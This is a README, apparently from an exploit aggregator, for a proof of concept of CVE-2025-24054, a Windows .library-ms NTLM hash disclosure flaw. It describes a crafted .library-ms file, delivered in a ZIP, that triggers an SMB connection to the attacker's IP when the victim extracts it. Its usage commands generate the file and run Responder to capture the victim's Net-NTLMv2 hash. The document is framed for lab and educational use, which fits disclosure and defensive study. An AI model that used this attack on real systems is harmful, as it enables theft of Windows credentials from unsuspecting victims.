Share
## https://sploitus.com/exploit?id=EC7F6522-57B1-5996-8F22-C2BC0C98EB5A
# CVE-2025-24054 PoC

A simple Proof of Concept for **CVE-2025-24054** โ€“ Windows Library (.library-ms) NTLM Hash Disclosure Vulnerability.

> **โš ๏ธ For Educational and Authorized Lab Use Only**

---

## Description

CVE-2025-24054 allows an attacker to force a Windows system to leak the victim's **Net-NTLMv2 hash** by using a specially crafted `.library-ms` file.

When the victim extracts a ZIP containing the malicious `.library-ms` file, Windows Explorer automatically initiates an SMB connection, leaking the NTLM hash.

## How It Works

1. Attacker generates a malicious `.library-ms` file containing a UNC path pointing to their machine.
2. The file is delivered inside a ZIP archive.
3. Victim extracts the ZIP file.
4. Windows Explorer automatically attempts to load the library, triggering an NTLM authentication request.
5. Attacker captures the Net-NTLMv2 hash using Responder.

![alt text](image.png)

### 1. Usage

 python poc.py -i YOUR-IP

### 2. Start Responder (Attacker Machine)


sudo responder -I eth0